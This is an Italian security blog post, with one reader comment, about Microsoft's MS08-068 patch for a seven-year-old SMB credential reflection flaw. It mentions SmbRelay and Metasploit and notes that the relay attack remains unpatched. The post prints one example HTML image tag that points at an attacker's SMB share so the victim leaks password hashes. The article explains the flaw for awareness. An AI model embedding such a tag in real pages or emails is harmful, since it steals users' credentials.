Uno Zero Day Lungo Sette Anni

Il 12 Novembre Microsoft ha rilasciato una patch denominata MS08-068: ma questa non è una notizia. Tutti i mesi Microsoft distribuisce aggiornamenti per i suoi sistemi operativi.

La notizia è che questa patch risolve un bug vecchio sette anni! Esistono da diversi anni tools in grado di sfruttare questo bug per accedere al sistema senza l’ausilio di nessuna password; bug ben conosciuto e utilizzato dagli ethical (ma anche non ethical) hacker di tutto il mondo.

L’altra notizia ancora più singolare è che questa patch risolve il problema… solo a metà. Infatti tramite il meccanismo di autenticazione SMB è possibile per l’hacker sfruttare le credenziali di un utente per collegarsi ad un altra macchina sulla quale l’utente ha accesso.

Nel 2001 durante la convention @lanta.con, l’hacker Sir Dystic presentò questa vulnerabilità, sfruttabile in due distinti modi.
    
Il primo modo, quello patchato dalla Microsoft sfrutta le credenziali di un utente per collegarsi alla sua macchina (credentials reflection); il secondo usa la stessa tecnica, però invece di sfruttare le credenziali dell’utente verso la sua macchina, usa queste informazioni per accedere ad un’altra macchina.

Esistono un paio di tools in grado di effettuare questi attacchi: Metasploit del solito HD Moore e SmbRelay del già citato Sir Dystic.

SmbRelay venne rilasciato già nel 2001, mentre il modulo Metasploit è stato rilasciato nel 2007.

In precedenza Metasploit implementava già un modulo (Smb capture) in grado di ottenere gli hash delle password di Windows tramite l’autenticazione SMB, hash craccabili in un secondo tempo.

Per effettuare questi attacchi l’hacker deve fare in modo che il computer della vittima si colleghi ad un computer su cui gira SmbRelay o Metasploit, inserendo in una pagina Web o in un’email un link SMB:

<img src=”\\Attacker\Share\pic.jpg”>

Questo “costringe” il computer della vittima a cercare di accedere alla condivisione sul computer dell’hacker. Windows per default tenta di autenticarsi sul computer destinazione, inviando le proprie credenziali (username, password in forma di hash): questo è il cuore della vulnerabilità in parte risolta da Microsoft.

2 comments to “Uno Zero Day Lungo Sette Anni”
  1. Quest’articolo sottolinea uno degli aspetti più critici del software proprietario: il controllo lo ha il produttore del software, e da lui dipendono i tempi di risoluzione dei problemi di sicurezza.
    Il patch day mensile di Microsoft a volte si rivela già fin troppo lungo, figuriamoci sette anni!

Comments are closed.